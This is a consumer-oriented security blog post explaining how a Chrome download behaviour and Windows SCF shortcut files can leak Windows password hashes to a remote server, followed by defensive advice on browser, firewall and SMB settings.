In order to be infected by most malware, you have to download a malicious file and open it. Downloading the bad file is simply not enough to cause you problems. But what if there was a file that downloaded and opened itself automatically? That would truly be your worst nightmare. Sadly, if you use Google’s Chrome browser, your nightmare has now arrived.
Browsers make our lives easier by automating a lot of processes. For example, if you don’t specify where you want your download to go, it will go into a file often called, ‘Downloads’. When Chrome assumes a file is safe, the user will receive no other information when a download is called for. The file is simply downloaded. Normally, this presents no problem. However, a new vulnerability in Chrome makes this automated process the springboard for a serious malware attack.
Most files will not open automatically when downloaded but a few will. Among these are files which will create an icon which is really a shortcut link to some other location. These files come with the extensions .lnk or .scf. The .lnk extension has been stopped from automatically opening but the .scf extension has not. It will open when the file or directory it is stored in, such as the ‘Download’ file, is opened. In other words, Windows File Directory will automatically activate the icon. The problem occurs when the SCF ‘icon’ is actually a link to a remote server. At this point, the remote server will receive the hashed passwords for the user’s PC and, if they are on a corporate or institutional network, the hashed password for this as well. So if the attacker can lead the victim to a website with a malicious SCF file, Chrome will help the attacker do the rest.
Maybe it’s a good idea to look at hashing at this point. If you already know about hashing, you can skip this paragraph. Hashing is basically a one-directional encrypting process. When you first register your login information on a website, the website transforms your password into a random series of numbers, letters, and symbols of a particular length called a ‘hash’. It’s the hash, not the actual password, that they store on the website. Unlike regular encryption, this hashing cannot be reversed. Thus, when a hacker steals your hashed password they cannot apply some formula or key to decrypt it. They have to use another technique which is basically, guessing. They simply type in a guessed password to see how it is hashed. If they have guessed correctly, they will see that their hashed password matches the one on the list of stolen hashed passwords. Only then can they log into your account.
Your Windows password is automatically hashed so the attacker operating the remote server that receives it has two options. They can try to use software to guess and match (crack) the hash in order to get the actual password, or they can use the hashed password itself. This is because some Microsoft services only require the hashed passwords to operate. Such services include OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live, and more. In other words, using either of these techniques can allow an attacker remote access to your computer and any network to which you may be connected. Needless to say that good hackers can leverage network access to steal sensitive data from an enterprise or compromise other users on the network. It all depends on whether their goal is information-based or financially based.
Although the Chrome browser may allow for downloads of SCF files to proceed without hindrance, you may suppose that antivirus software will detect these files and notify users of their presence. Unfortunately, this does not appear to be the case. The main investigator of this vulnerability stated that, “we tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous. All tested solutions failed to flag it as anything suspicious.” Moreover, Windows Explorer automatically removes the visibility of the SCF extension so it will not appear in the name of the file. In other words, if the attacker uses a file named photo.jpg.scf, the user only sees photo.jpg, which may appear as a valid jpg file.
Since the file does not appear malicious to either Chrome or antivirus software, you will need to be the download filter. To do this, you simply have to set Chrome’s advanced settings to “Ask where to store each file before downloading” option. Then, you will be able to intercept any automatic downloads that may otherwise occur.
You may also want to adjust your firewall to stop any SMB communications to devices outside of your network. Unless you have an older Windows operating system, such as Windows XP, you should probably disable SMB 1.0. I gave directions on how to do this in a recent post.
Although it might seem an easy flaw for Google to fix, so far, none has been reported. Thus, unless you want your computer remotely controlled by someone else or your business to be infiltrated, you need to browse with some caution. Of course, there is another option. You can change your browser. Sorry Google.